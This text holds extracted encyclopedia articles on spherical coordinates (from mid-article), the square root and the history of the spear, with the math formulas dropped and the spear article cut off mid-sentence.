which is the standard convention for geographic longitude. For the polar angle , the range (interval) for inclination is , which is equivalent to elevation range (interval) . In geography, the latitude is the elevation. Even with these restrictions, if the polar angle (inclination) is 0° or 180°elevation is −90° or +90°then the azimuth angle is arbitrary; and if is zero, both azimuth and polar angles are arbitrary. To define the coordinates as unique, the user can assert the convention that (in these cases) the arbitrary coordinates are set to zero. Plotting To plot any dot from its spherical coordinates , where is inclination, the user would: move units from the origin in the zenith reference direction (z-axis); then rotate by the amount of the azimuth angle () about the origin from the designated azimuth reference direction, (i.e., either the x or yaxis, see Definition, above); and then rotate from the z-axis by the amount of the angle. Applications Just as the two-dimensional Cartesian coordinate system is usefulhas a wide set of applicationson a planar surface, a two-dimensional spherical coordinate system is useful on the surface of a sphere. For example, one sphere that is described in Cartesian coordinates with the equation can be described in spherical coordinates by the simple equation . (In this systemshown here in the mathematics conventionthe sphere is adapted as a unit sphere, where the radius is set to unity and then can generally be ignored, see graphic.) This (unit sphere) simplification is also useful when dealing with objects such as rotational matrices. Spherical coordinates are also useful in analyzing systems that have some degree of symmetry about a point, including: volume integrals inside a sphere; the potential energy field surrounding a concentrated mass or charge; or global weather simulation in a planet's atmosphere. Three dimensional modeling of loudspeaker output patterns can be used to predict their performance. A number of polar plots are required, taken at a wide selection of frequencies, as the pattern changes greatly with frequency. Polar plots help to show that many loudspeakers tend toward omnidirectionality at lower frequencies. An important application of spherical coordinates provides for the separation of variables in two partial differential equationsthe Laplace and the Helmholtz equationsthat arise in many physical problems. The angular portions of the solutions to such equations take the form of spherical harmonics. Another application is ergonomic design, where is the arm length of a stationary person and the angles describe the direction of the arm as it reaches out. The spherical coordinate system is also commonly used in 3D game development to rotate the camera around the player's position In geography Instead of inclination, the geographic coordinate system uses elevation angle (or latitude), in the range (aka domain) and rotated north from the equator plane. Latitude (i.e., the angle of latitude) may be either geocentric latitude, measured (rotated) from the Earth's centerand designated variously by or geodetic latitude, measured (rotated) from the observer's local vertical, and typically designated . The polar angle (inclination), which is 90° minus the latitude and ranges from 0 to 180°, is called colatitude in geography. The azimuth angle (or longitude) of a given position on Earth, commonly denoted by , is measured in degrees east or west from some conventional reference meridian (most commonly the IERS Reference Meridian); thus its domain (or range) is and a given reading is typically designated "East" or "West". For positions on the Earth or other solid celestial body, the reference plane is usually taken to be the plane perpendicular to the axis of rotation. Instead of the radial distance geographers commonly use altitude above or below some local reference surface (vertical datum), which, for example, may be the mean sea level. When needed, the radial distance can be computed from the altitude by adding the radius of Earth, which is approximately . However, modern geographical coordinate systems are quite complex, and the positions implied by these simple formulae may be inaccurate by several kilometers. The precise standard meanings of latitude, longitude and altitude are currently defined by the World Geodetic System (WGS), and take into account the flattening of the Earth at the poles (about ) and many other details. Planetary coordinate systems use formulations analogous to the geographic coordinate system. In astronomy A series of astronomical coordinate systems are used to measure the elevation angle from several fundamental planes. These reference planes include: the observer's horizon, the galactic equator (defined by the rotation of the Milky Way), the celestial equator (defined by Earth's rotation), the plane of the ecliptic (defined by Earth's orbit around the Sun), and the plane of the earth terminator (normal to the instantaneous direction to the Sun). Coordinate system conversions As the spherical coordinate system is only one of many three-dimensional coordinate systems, there exist equations for converting coordinates between the spherical coordinate system and others. Cartesian coordinates The spherical coordinates of a point in the ISO convention (i.e. for physics: radius , inclination , azimuth ) can be obtained from its Cartesian coordinates by the formulae The inverse tangent denoted in must be suitably defined, taking into account the correct quadrant of , as done in the equations above. See the article on atan2. Alternatively, the conversion can be considered as two sequential rectangular to polar conversions: the first in the Cartesian plane from to , where is the projection of onto the -plane, and the second in the Cartesian -plane from to . The correct quadrants for and are implied by the correctness of the planar rectangular to polar conversions. These formulae assume that the two systems have the same origin, that the spherical reference plane is the Cartesian plane, that is inclination from the direction, and that the azimuth angles are measured from the Cartesian axis (so that the axis has ). If θ measures elevation from the reference plane instead of inclination from the zenith the arccos above becomes an arcsin, and the and below become switched. Conversely, the Cartesian coordinates may be retrieved from the spherical coordinates (radius , inclination , azimuth ), where , , , by Cylindrical coordinates Cylindrical coordinates (axial radius ρ, azimuth φ, elevation z) may be converted into spherical coordinates (central radius r, inclination θ, azimuth φ), by the formulas Conversely, the spherical coordinates may be converted into cylindrical coordinates by the formulae These formulae assume that the two systems have the same origin and same reference plane, measure the azimuth angle in the same senses from the same axis, and that the spherical angle is inclination from the cylindrical axis. Generalization It is also possible to deal with ellipsoids in Cartesian coordinates by using a modified version of the spherical coordinates. Let P be an ellipsoid specified by the level set The modified spherical coordinates of a point in P in the ISO convention (i.e. for physics: radius , inclination , azimuth ) can be obtained from its Cartesian coordinates by the formulae An infinitesimal volume element is given by The square-root factor comes from the property of the determinant that allows a constant to be pulled out from a column: Integration and differentiation in spherical coordinates The following equations (Iyanaga 1977) assume that the colatitude is the inclination from the positive axis, as in the physics convention discussed. The line element for an infinitesimal displacement from to is where are the local orthogonal unit vectors in the directions of increasing , , and , respectively, and , , and are the unit vectors in Cartesian coordinates. The linear transformation to this right-handed coordinate triplet is a rotation matrix, This gives the transformation from the Cartesian to the spherical, the other way around is given by its inverse. Note: the matrix is an orthogonal matrix, that is, its inverse is simply its transpose. The Cartesian unit vectors are thus related to the spherical unit vectors by: The general form of the formula to prove the differential line element, is that is, the change in is decomposed into individual changes corresponding to changes in the individual coordinates. To apply this to the present case, one needs to calculate how changes with each of the coordinates. In the conventions used, Thus, The desired coefficients are the magnitudes of these vectors: The surface element spanning from to and to on a spherical surface at (constant) radius is then Thus the differential solid angle is The surface element in a surface of polar angle constant (a cone with vertex at the origin) is The surface element in a surface of azimuth constant (a vertical half-plane) is The volume element spanning from to , to , and to is specified by the determinant of the Jacobian matrix of partial derivatives, namely Thus, for example, a function can be integrated over every point in by the triple integral The del operator in this system leads to the following expressions for the gradient and Laplacian for scalar fields, And it leads to the following expressions for the divergence and curl of vector fields, Further, the inverse Jacobian in Cartesian coordinates is The metric tensor in the spherical coordinate system is . Distance in spherical coordinates In spherical coordinates, given two points with being the azimuthal coordinate The distance between the two points can be expressed as Kinematics In spherical coordinates, the position of a point or particle (although better written as a triple) can be written as Its velocity is then and its acceleration is The angular momentum is Where is mass. In the case of a constant or else , this reduces to vector calculus in polar coordinates. The corresponding angular momentum operator then follows from the phase-space reformulation of the above, The torque is given as The kinetic energy is given as
Mathematics
Geometry: General
null
29208
https://en.wikipedia.org/wiki/Square%20root
Square root
In mathematics, a square root of a number is a number such that ; in other words, a number whose square (the result of multiplying the number by itself, or ) is . For example, 4 and −4 are square roots of 16 because . Every nonnegative real number has a unique nonnegative square root, called the principal square root or simply the square root (with a definite article, see below), which is denoted by where the symbol "" is called the radical sign or radix. For example, to express the fact that the principal square root of 9 is 3, we write . The term (or number) whose square root is being considered is known as the radicand. The radicand is the number or expression underneath the radical sign, in this case, 9. For non-negative , the principal square root can also be written in exponent notation, as . Every positive number has two square roots: (which is positive) and (which is negative). The two roots can be written more concisely using the ± sign as . Although the principal square root of a positive number is only one of its two square roots, the designation "the square root" is often used to refer to the principal square root. Square roots of negative numbers can be discussed within the framework of complex numbers. More generally, square roots can be considered in any context in which a notion of the "square" of a mathematical object is defined. These include function spaces and square matrices, among other mathematical structures. History The Yale Babylonian Collection clay tablet YBC 7289 was created between 1800 BC and 1600 BC, showing and respectively as 1;24,51,10 and 0;42,25,35 base 60 numbers on a square crossed by two diagonals. (1;24,51,10) base 60 corresponds to 1.41421296, which is correct to 5 decimal places (1.41421356...). The Rhind Mathematical Papyrus is a copy from 1650 BC of an earlier Berlin Papyrus and other textspossibly the Kahun Papyrusthat shows how the Egyptians extracted square roots by an inverse proportion method. In Ancient India, the knowledge of theoretical and applied aspects of square and square root was at least as old as the Sulba Sutras, dated around 800–500 BC (possibly much earlier). A method for finding very good approximations to the square roots of 2 and 3 are given in the Baudhayana Sulba Sutra. Apastamba who was dated around 600 BCE has given a strikingly accurate value for which is correct up to five decimal places as . Aryabhata, in the Aryabhatiya (section 2.4), has given a method for finding the square root of numbers having many digits. It was known to the ancient Greeks that square roots of positive integers that are not perfect squares are always irrational numbers: numbers not expressible as a ratio of two integers (that is, they cannot be written exactly as , where and are integers). This is the theorem Euclid X, 9, almost certainly due to Theaetetus dating back to . The discovery of irrational numbers, including the particular case of the square root of 2, is widely associated with the Pythagorean school. Although some accounts attribute the discovery to Hippasus, the specific contributor remains uncertain due to the scarcity of primary sources and the secretive nature of the brotherhood. It is exactly the length of the diagonal of a square with side length 1. In the Chinese mathematical work Writings on Reckoning, written between 202 BC and 186 BC during the early Han dynasty, the square root is approximated by using an "excess and deficiency" method, which says to "...combine the excess and deficiency as the divisor; (taking) the deficiency numerator multiplied by the excess denominator and the excess numerator times the deficiency denominator, combine them as the dividend." A symbol for square roots, written as an elaborate R, was invented by Regiomontanus (1436–1476). An R was also used for radix to indicate square roots in Gerolamo Cardano's Ars Magna. According to historian of mathematics D.E. Smith, Aryabhata's method for finding the square root was first introduced in Europe by Cataneo—in 1546. According to Jeffrey A. Oaks, Arabs used the letter jīm/ĝīm (), the first letter of the word "" (variously transliterated as jaḏr, jiḏr, ǧaḏr or ǧiḏr, "root"), placed in its initial form () over a number to indicate its square root. The letter jīm resembles the present square root shape. Its usage goes as far as the end of the twelfth century in the works of the Moroccan mathematician Ibn al-Yasamin. The symbol "√" for the square root was first used in print in 1525, in Christoph Rudolff's Coss. Properties and uses The principal square root function (usually just referred to as the "square root function") is a function that maps the set of nonnegative real numbers onto itself. In geometrical terms, the square root function maps the area of a square to its side length. The square root of is rational if and only if is a rational number that can be represented as a ratio of two perfect squares. (See square root of 2 for proofs that this is an irrational number, and quadratic irrational for a proof for all non-square natural numbers.) The square root function maps rational numbers into algebraic numbers, the latter being a superset of the rational numbers). For all real numbers , (see absolute value). For all nonnegative real numbers and , and The square root function is continuous for all nonnegative , and differentiable for all positive . If denotes the square root function, whose derivative is given by: The Taylor series of about converges for , and is given by The square root of a nonnegative number is used in the definition of Euclidean norm (and distance), as well as in generalizations such as Hilbert spaces. It defines an important concept of standard deviation used in probability theory and statistics. It has a major use in the formula for solutions of a quadratic equation. Quadratic fields and rings of quadratic integers, which are based on square roots, are important in algebra and have uses in geometry. Square roots frequently appear in mathematical formulas elsewhere, as well as in many physical laws. Square roots of positive integers A positive number has two square roots, one positive, and one negative, which are opposite to each other. When talking of the square root of a positive integer, it is usually the positive square root that is meant. The square roots of an integer are algebraic integers—more specifically quadratic integers. The square root of a positive integer is the product of the roots of its prime factors, because the square root of a product is the product of the square roots of the factors. Since only roots of those primes having an odd power in the factorization are necessary. More precisely, the square root of a prime factorization is As decimal expansions The square roots of the perfect squares (e.g., 0, 1, 4, 9, 16) are integers. In all other cases, the square roots of positive integers are irrational numbers, and hence have non-repeating decimals in their decimal representations. Decimal approximations of the square roots of the first few natural numbers are given in the following table. As expansions in other numeral systems As with before, the square roots of the perfect squares (e.g., 0, 1, 4, 9, 16) are integers. In all other cases, the square roots of positive integers are irrational numbers, and therefore have non-repeating digits in any standard positional notation system. The square roots of small integers are used in both the SHA-1 and SHA-2 hash function designs to provide nothing up my sleeve numbers. As periodic continued fractions A result from the study of irrational numbers as simple continued fractions was obtained by Joseph Louis Lagrange . Lagrange found that the representation of the square root of any non-square positive integer as a continued fraction is periodic. That is, a certain pattern of partial denominators repeats indefinitely in the continued fraction. In a sense these square roots are the very simplest irrational numbers, because they can be represented with a simple repeating pattern of integers. The square bracket notation used above is a short form for a continued fraction. Written in the more suggestive algebraic form, the simple continued fraction for the square root of 11, [3; 3, 6, 3, 6, ...], looks like this: where the two-digit pattern {3, 6} repeats over and over again in the partial denominators. Since , the above is also identical to the following generalized continued fractions: Computation Square roots of positive numbers are not in general rational numbers, and so cannot be written as a terminating or recurring decimal expression. Therefore in general any attempt to compute a square root expressed in decimal form can only yield an approximation, though a sequence of increasingly accurate approximations can be obtained. Most pocket calculators have a square root key. Computer spreadsheets and other software are also frequently used to calculate square roots. Pocket calculators typically implement efficient routines, such as the Newton's method (frequently with an initial guess of 1), to compute the square root of a positive real number. When computing square roots with logarithm tables or slide rules, one can exploit the identities where and are the natural and base-10 logarithms. By trial-and-error, one can square an estimate for and raise or lower the estimate until it agrees to sufficient accuracy. For this technique it is prudent to use the identity as it allows one to adjust the estimate by some amount and measure the square of the adjustment in terms of the original estimate and its square. The most common iterative method of square root calculation by hand is known as the "Babylonian method" or "Heron's method" after the first-century Greek philosopher Heron of Alexandria, who first described it. The method uses the same iterative scheme as the Newton–Raphson method yields when applied to the function , using the fact that its slope at any point is , but predates it by many centuries. The algorithm is to repeat a simple calculation that results in a number closer to the actual square root each time it is repeated with its result as the new input. The motivation is that if is an overestimate to the square root of a nonnegative real number then will be an underestimate and so the average of these two numbers is a better approximation than either of them. However, the inequality of arithmetic and geometric means shows this average is always an overestimate of the square root (as noted below), and so it can serve as a new overestimate with which to repeat the process, which converges as a consequence of the successive overestimates and underestimates being closer to each other after each iteration. To find : Start with an arbitrary positive start value . The closer to the square root of , the fewer the iterations that will be needed to achieve the desired precision. Replace by the average between and . Repeat from step 2, using this average as the new value of . That is, if an arbitrary guess for is , and , then each is an approximation of which is better for large than for small . If is positive, the convergence is quadratic, which means that in approaching the limit, the number of correct digits roughly doubles in each next iteration. If , the convergence is only linear; however, so in this case no iteration is needed. Using the identity the computation of the square root of a positive number can be reduced to that of a number in the range . This simplifies finding a start value for the iterative method that is close to the square root, for which a polynomial or piecewise-linear approximation can be used. The time complexity for computing a square root with digits of precision is equivalent to that of multiplying two -digit numbers. Another useful method for calculating the square root is the shifting nth root algorithm, applied for . The name of the square root function varies from programming language to programming language, with sqrt (often pronounced "squirt") being common, used in C and derived languages such as C++, JavaScript, PHP, and Python. Square roots of negative and complex numbers The square of any positive or negative number is positive, and the square of 0 is 0. Therefore, no negative number can have a real square root. However, it is possible to work with a more inclusive set of numbers, called the complex numbers, that does contain solutions to the square root of a negative number. This is done by introducing a new number, denoted by (sometimes by , especially in the context of electricity where i traditionally represents electric current) and called the imaginary unit, which is defined such that . Using this notation, we can think of as the square root of −1, but we also have and so is also a square root of −1. By convention, the principal square root of −1 is , or more generally, if is any nonnegative number, then the principal square root of is The right side (as well as its negative) is indeed a square root of , since For every non-zero complex number there exist precisely two numbers such that : the principal square root of (defined below), and its negative. Principal square root of a complex number To find a definition for the square root that allows us to consistently choose a single value, called the principal value, we start by observing that any complex number can be viewed as a point in the plane, expressed using Cartesian coordinates. The same point may be reinterpreted using polar coordinates as the pair where is the distance of the point from the origin, and is the angle that the line from the origin to the point makes with the positive real () axis. In complex analysis, the location of this point is conventionally written If then the of is defined to be the following: The principal square root function is thus defined using the non-positive real axis as a branch cut. If is a non-negative real number (which happens if and only if ) then the principal square root of is in other words, the principal square root of a non-negative real number is just the usual non-negative square root. It is important that because if, for example, (so ) then the principal square root is but using would instead produce the other square root The principal square root function is holomorphic everywhere except on the set of non-positive real numbers (on strictly negative reals it is not even continuous). The above Taylor series for remains valid for complex numbers with The above can also be expressed in terms of trigonometric functions: Algebraic formula When the number is expressed using its real and imaginary parts, the following formula can be used for the principal square root: where if and otherwise. In particular, the imaginary parts of the original number and the principal value of its square root have the same sign. The real part of the principal value of the square root is always nonnegative. For example, the principal square roots of are given by:
Mathematics
Basics
null
29234
https://en.wikipedia.org/wiki/Spear
Spear
A spear is a polearm consisting of a shaft, usually of wood, with a pointed head. The head may be simply the sharpened end of the shaft itself, as is the case with fire hardened spears, or it may be made of a more durable material fastened to the shaft, such as bone, flint, obsidian, copper, bronze, iron, or steel. The most common design for hunting and/or warfare, since ancient times has incorporated a metal spearhead shaped like a triangle, diamond, or leaf. The heads of fishing spears usually feature multiple sharp points, with or without barbs. Spears can be divided into two broad categories: those designed for thrusting as a melee weapon (including weapons such as lances and pikes) and those designed for throwing as a ranged weapon (usually referred to as javelins). The spear has been used throughout human history as a weapon for hunting and/or fishing and for warfare. Along with the club, knife, and axe, it is one of the earliest and most widespread tools ever developed by early humans. As a weapon, it may be wielded with either one or two hands. It was used in virtually every conflict up until the modern era, where even to this day, it lives on in the form of a bayonet fixed onto the muzzle of a long gun. Etymology The word spear comes from the Old English spere, from the Proto-Germanic speri, from a Proto-Indo-European root *sper- "spear, pole". Origins Spear manufacture and use is not confined to humans. It is also practiced by the western chimpanzee. Chimpanzees near Kédougou, Senegal have been observed to create spears by breaking straight limbs off trees, stripping them of their bark and side branches, and sharpening one end with their teeth. They then used the weapons to hunt galagos sleeping in hollows. Prehistory The Clacton Spear found in England and the Schöningen spears found in present-day Germany document that wooden spears have been used for hunting since at least 400,000 years ago. A 2012 study from the site of Kathu Pan in South Africa suggests that hominids, possibly Homo heidelbergensis, may have developed the technology of hafted stone-tipped spears in Africa about 500,000 years ago. Wood does not preserve well, however, and Craig Stanford, a primatologist and professor of anthropology at the University of Southern California, has suggested that the discovery of spear use by chimpanzees means that early humans may have used wooden spears before this. From circa 200,000 BC onwards, Middle Paleolithic humans began to make complex stone blades with flaked edges which were used as spear heads. These stone heads could be fixed to the spear shaft by gum or resin or by bindings made of animal sinew, leather strips or vegetable matter. During this period, a clear difference remained between spears designed to be thrown and those designed to be used in hand-to-hand combat. By the Magdalenian period (c. 15,000–9500 BC), spear-throwers similar to the later atlatl were in use. Military Europe Classical antiquity Ancient Greeks The spear is the main weapon of the warriors of Homer's Iliad. The use of both a single thrusting spear and two throwing spears are mentioned. It has been suggested that two styles of combat are being described; an early style, with thrusting spears, dating to the Mycenaean period in which the Iliad is set, and, anachronistically, a later style, with throwing spears, from Homer's own Archaic period. In the 7th century BC, the Greeks evolved a new close-order infantry formation, the phalanx. The key to this formation was the hoplite, who was equipped with a large, circular, bronze-faced shield (aspis) and a spear with an iron head and bronze butt-spike (doru). The hoplite phalanx dominated warfare among the Greek City States from the 7th into the 4th century BC. The 4th century saw major changes. One was the greater use of peltasts, light infantry armed with spear and javelins. The other was the development of the sarissa, a two-handed pike in length, by the Macedonians under Phillip of Macedon and Alexander the Great. The pike phalanx, supported by peltasts and cavalry, became the dominant mode of warfare among the Greeks from the late 4th century onward until Greek military systems were supplanted by the Roman legions. Ancient Romans In the pre-Marian Roman armies, the first two lines of battle, the hastati and principes, often fought with a sword called a gladius and pila, heavy javelins that were specifically designed to be thrown at an enemy to pierce and foul a target's shield. Originally the principes were armed with a short spear called a hasta, but these gradually fell out of use, eventually being replaced by the gladius. The third line, the triarii, continued to use the hasta. From the late 2nd century BC, all legionaries were equipped with the pilum. The pilum continued to be the standard legionary spear until the end of the 2nd century AD. Auxilia, however, were equipped with a simple hasta and, perhaps, javelins or darts. During the 3rd century AD, although the pilum continued to be used, legionaries usually were equipped with other forms of throwing and thrusting spear, similar to auxilia of the previous century. By the 4th century, the pilum had effectively disappeared from common use. In the late period of the Roman Empire, the spear became more often used because of its anti-cavalry capacities as the barbarian invasions were often conducted by people with a developed culture of cavalry in warfare. Medieval period After the fall of the Western Roman Empire, the spear and shield continued to be used by nearly all Western European cultures. Since a medieval spear required only a small amount of steel along the sharpened edges (most of the spear-tip was wrought iron), it was an economical weapon. Quick to manufacture, and needing less smithing skill than a sword, it remained the main weapon of the common soldier. The Vikings, for instance, although often portrayed with an axe, sword, or lance in hand, were armed mostly with spears, as were their Anglo-Saxon, Irish, or continental contemporaries. Spears eventually evolved into lances; this is where the lance depiction comes from. With a good majority of Medieval weapons being spears they became integrated into many war tactics. Spears were very commonly used while providing a defensive block. When men on horses tried to get by these blocks, they would often be killed by the spears that could poke through the shield walls. Spears became more common than swords and axes because of how cheap, long, and fast spears were made. Infantry Broadly speaking, spears were either designed to be used in melee, or to be thrown. Within this simple classification, there was a remarkable range of types. For example, M. J. Swanton identified thirty different spearhead categories and sub-categories in early Saxon England. Most medieval spearheads were generally leaf-shaped. Notable types of early medieval spears include the angon, a throwing spear with a long head similar to the Roman pilum, used by the Franks and Anglo-Saxons, and the winged (or lugged) spear, which had two prominent wings at the base of the spearhead, either to prevent the spear penetrating too far into an enemy or to aid in spear fencing. Originally a Frankish weapon, the winged spear also was popular with the Vikings. It would become the ancestor of later medieval polearms, such as the partisan and spetum. The thrusting spear also has the advantage of reach, being considerably longer than other weapon types. Exact spear lengths are hard to deduce as few spear shafts survive archaeologically, but would seem to have been the average length. Some nations were noted for their long spears, including the Scots and the Flemish. Spears usually were used in tightly ordered formations, such as the shield wall or the schiltron. To resist cavalry, spear shafts could be planted against the ground. William Wallace drew up his schiltrons in a circle at the Battle of Falkirk in 1298 to deter charging cavalry; this was a widespread tactic sometimes known as the "crown" formation. Thomas Randolph, 1st Earl of Moray used a circular schiltron on the first day of the Battle of Bannockburn. However, the rectangular schiltron was much more common and was used by King Robert the Bruce on the second day of the Battle of Bannockburn and in the Battle of Old Byland when he defeated English armies. Throwing spears became rarer as the Middle Ages drew on, but survived in the hands of specialists such as the Catalan Almogavars. They were commonly used in Ireland until the end of the 16th century. Spears began to lose fashion among the infantry during the 14th century, being replaced by polearms that combined the thrusting properties of the spear with the cutting properties of the axe, such as the halberd. Where spears were retained they grew in length, eventually evolving into pikes, which would be a dominant infantry weapon in the 16th and 17th centuries. Cavalry Cavalry spears were originally the same as infantry spears and were often used with two hands or held with one hand overhead. In the 12th century, after the adoption of stirrups and a high-cantled saddle, the spear became a decidedly more powerful weapon. A mounted knight would secure the lance by holding it with one hand and tucking it under the armpit (the couched lance technique) In combination with a lance rest, this allowed all the momentum of the horse and knight to be focused on the weapon's tip, whilst still retaining accuracy and control. This use of the spear spurred the development of the lance as a distinct weapon that was perfected in the medieval sport of jousting. In the 14th century, tactical developments meant that knights and men-at-arms often fought on foot. This led to the practice of shortening the lance to about to make it more manageable. As dismounting became commonplace, specialist polearms such as the pollaxe were adopted by knights and this practice ceased. Introduction of gunpowder The development of both the long, two-handed pike and gunpowder firearms in Renaissance Europe saw an ever-increasing focus on integrated infantry tactics. Those infantry not armed with these weapons carried variations on the polearm, including the halberd and the bill. At the start of the Renaissance, cavalry remained predominantly lance-armed; gendarmes with the heavy knightly lance and lighter cavalry with a variety of lighter lances. By the 1540s, however, pistol-armed cavalry called reiters were beginning to make their mark. Cavalry armed with pistols and other lighter firearms, along with a sword, had virtually replaced lance armed cavalry in Western Europe by the beginning of the 17th century. Ultimately, the spear proper was rendered obsolete on the battlefield. Its last flowering was the half-pike or spontoon, a shortened version of the pike carried by officers of various ranks. While originally a weapon, this came to be seen more as a badge of office, or leading staff by which troops were directed. The half-pike, sometimes known as a boarding pike, was also used as a weapon on board ships until the late 19th century. Middle East Modern era Muslim warriors used a spear that was called an az-zaġāyah. Berbers pronounced it zaġāya, but the English term, derived from the Old French via Berber, is "assegai". It is a polearm used for throwing or hurling, usually a light spear or javelin made of hard wood and pointed with a forged iron tip. The az-zaġāyah played an important role during the Islamic conquest as well as during later periods, well into the 20th century. A longer pole az-zaġāyah was being used as a hunting weapon from horseback. The az-zaġāyah was widely used. It existed in various forms in areas stretching from Southern Africa to the Indian subcontinent, although these places already had their own variants of the spear. This javelin was the weapon of choice during the Fulani jihad as well as during the Mahdist War in Sudan. It is still being used by certain wandering Sufi ascetics (Derwishes). Asia China In the Chinese martial arts, the Chinese spear (Qiang 槍) is popularly known as the "king of weapons". The spear is listed in the group of the four major weapons (along with the gun (staff), dao (a single-edged blade similar to a sabre), and the jian (sword)). Spears were used first as hunting weapons amongst the ancient Chinese. They became popular as infantry weapons during the Warring States and Qin era, when spearmen were used as especially highly disciplined soldiers in organized group attacks. When used in formation fighting, spearmen would line up their large rectangular or circular shields in a shieldwall manner. The Qin also employed long spears (more akin to a pike) in formations similar to Swiss pikemen in order to ward off cavalry. The Han Empire would use similar tactics as its Qin predecessors. Halberds, polearms, and dagger axes were also common weapons during this time. Spears were also common weaponry for Warring States, Qin, and Han era cavalry units. During these eras, the spear would develop into a longer lance-like weapon used for cavalry charges. There are many words in Chinese that would be classified as a spear in English. The Mao is the predecessor of the Qiang. The first bronze Mao appeared in the Shang dynasty. This weapon was less prominent on the battlefield than the ge (dagger-axe). In some archaeological examples two tiny holes or ears can be found in the blade of the spearhead near the socket, these holes were presumably used to attach tassels, much like modern day wushu spears. In the early Shang, the Mao appeared to have a relatively short shaft as well as a relatively narrow shaft as opposed to Mao in the later Shang and Western Zhou period. Some Mao from this era are heavily decorated as is evidenced by a Warring States period Mao from the Ba Shu area. In the Han dynasty the Mao and the Ji (戟 Ji can be loosely defined as a halberd) rose to prominence in the military. Interesting to note is that the amount of iron Mao-heads found exceeds the number of bronze heads. By the end of the Han dynasty (Eastern Han) the process of replacement of the iron Mao had been completed and the bronze Mao had been rendered completely obsolete. After the Han dynasty toward the Sui and Tang dynasties the Mao used by cavalry were fitted with much longer shafts, as is mentioned above. During this era, the use of the Shuo (矟) was widespread among the footmen. The Shuo can be likened to a pike or simply a long spear. After the Tang dynasty, the popularity of the Mao declined and was replaced by the Qiang (枪). The Tang dynasty divided the Qiang in four categories: "一曰漆枪, 二曰木枪, 三曰白杆枪, 四曰扑头枪。” Roughly translated the four categories are: Qi (a kind of wood) Spears, Wooden Spears, Bai Gan (A kind of wood) Spears and Pu Tou Qiang. The Qiang that were produced in the Song and Ming dynasties consisted of four major parts: Spearhead, Shaft, End Spike and Tassel. The types of Qiang that exist are many. Among the types there are cavalry Qiang that were the length of one zhang (approximately ), Litte-Flower Spears (Xiao Hua Qiang 小花枪) that are the length of one person and their arm extended above his head, double hooked spears, single hooked spears, ringed spears and many more. There is some confusion as to how to distinguish the Qiang from the Mao, as they are obviously very similar. Some people say that a Mao is longer than a Qiang, others say that the main difference is between the stiffness of the shaft, where the Qiang would be flexible and the Mao would be stiff. Scholars seem to lean toward the latter explanation more than the former. Because of the difference in the construction of the Mao and the Qiang, the usage is also different, though there is no definitive answer as to what exactly the differences are between the Mao and the Qiang. India Spears are known as Bhala in Indian languages. Spears in the Indian society were used both in missile and non-missile form, both by cavalry and foot-soldiers. Mounted spear-fighting was practiced using with a , ball-tipped wooden lance called a bothati, the end of which was covered in dye so that hits may be confirmed. Spears were constructed from a variety of materials such as the sang made completely of steel, and the ballam which had a bamboo shaft. The Arab presence in Sindh and the Mameluks of Delhi introduced the Middle Eastern javelin into India. The Rajputs wielded a type of spear for infantrymen which had a club integrated into the spearhead, and a pointed butt end. Other spears had forked blades, several spear-points, and numerous other innovations. One particular spear unique to India was the vita or corded lance. Used by the Maratha Army, it had a rope connecting the spear with the user's wrist, allowing the weapon to be thrown and pulled back. The Vel is a type of spear or lance, originated in Southern India, primarily used by Tamils. Sikh Nihangs sometimes carry a spear even today. Spears were used in conflicts and training by armed paramilitary units such as the razakars of Nizams of Hyderabad State as late as the second half of the 20th century. Japan The hoko spear was used in ancient Japan sometime between the Yayoi period and the Heian period, but it became unpopular as early samurai often acted as horseback archers. Medieval Japan employed spears again for infantrymen to use, but it was not until the 11th century in that samurai began to prefer spears over bows. Several polearms were used in the Japanese theatres; the naginata was a glaive-like weapon with a long, curved blade popularly among the samurai and the Buddhist warrior-monks, often used against cavalry; the yari was a longer polearm, with a straight-bladed spearhead, which became the weapon of choice of both the samurai and the ashigaru (footmen) during the Warring States Era; the horseback samurai used shorter yari for his single-armed combat; on the other hand, ashigaru infantries used long yari (similar with European pike) for their massed combat formation. Philippines Filipino spears (sibat) were used as both a weapon and a tool throughout the Philippines. It is also called a bangkaw (after the Bankaw Revolt.), sumbling or palupad in the islands of Visayas and Mindanao. Sibat are typically made from rattan, either with a sharpened tip or a head made from metal. These heads may either be single-edged, double-edged or barbed. Styles vary according to function and origin. For example, a sibat designed for fishing may not be the same as those used for hunting. The spear was used as the primary weapon in expeditions and battles against neighbouring island kingdoms and it became famous during the 1521 Battle of Mactan, where the chieftain Lapu Lapu of Cebu fought against Spanish forces led by Ferdinand Magellan who was subsequently killed. Africa South Africa The various types of the assegai (a light spear or javelin made of wood and pointed with iron or fire-hardened tip) were used throughout Africa and it was the most common weapon used before the introduction of firearms. The Zulu, Xhosa and other Nguni tribes of South Africa were renowned for their use of the assegai. Shaka of the Zulu invented a shorter stabbing spear with a shaft and a larger, broader blade one foot (0.3m) long. This weapon is otherwise known as the iklwa or ixwa, after the sound that was heard as it was withdrawn from the victim's wound. The traditional spear was not abandoned, but was used to range attack enemy formations before closing in for close quarters battle with the iklwa. This tactical combination originated during Shaka's military reforms. This weapon was typically used with one hand while the off hand held a cowhide shield for protection. Egypt Similar to most armies of their period, Ancient Egyptian forces were centered around the use of the spear. In battle, spearmen would be armed with a bronze-tipped spear (dja) and shield (ikem), which were used in elaborate formations much like Greek and Roman forces. Before the Hyksos invasion into Egypt, wooden spears were used, which were prone to splinter, but the influx of a new population brought innovations around bronze technology. Unlike other cultures who wielded spears at this time, the Egyptians did not treat their javelins (around 1 meter to 3.3 feet long) as disposable, using them both for thrusting and throwing. The Americas West Mexico and South America (Pre-Colombia) As advanced metallurgy was largely unknown in pre-Columbian America outside of Western Mexico and South America, most weapons in Meso-America were made of wood or obsidian. This did not mean that they were less lethal, as obsidian may be sharpened to become many times sharper than steel. Meso-American spears varied greatly in shape and size. While the Aztecs preferred the sword-like macuahuitl clubs for fighting, the advantage of a far-reaching thrusting weapon was recognised, and a large portion of the army would carry the tepoztopilli into battle. The tepoztopilli was a polearm, and to judge from depictions in various Aztec codices, it was roughly the height of a man, with a broad wooden head about twice the length of the users' palm or shorter, edged with razor-sharp obsidian blades which were deeply set in grooves carved into the head, and cemented in place with bitumen or plant resin as an adhesive. The tepoztopilli was able both to thrust and slash effectively. Throwing spears also were used extensively in Meso-American warfare, usually with the help of an atlatl. Throwing spears were typically shorter and more stream-lined than the tepoztopilli, and some had obsidian edges for greater penetration. Native Americans Typically, most spears made by Native Americans were created from materials surrounding their communities. Usually, the shaft of the spear was made with a wooden stick while the head of the spear was fashioned from arrowheads, pieces of metal such as copper, or a bone that had been sharpened. Spears were a preferred weapon by many since it was inexpensive to create, could more easily 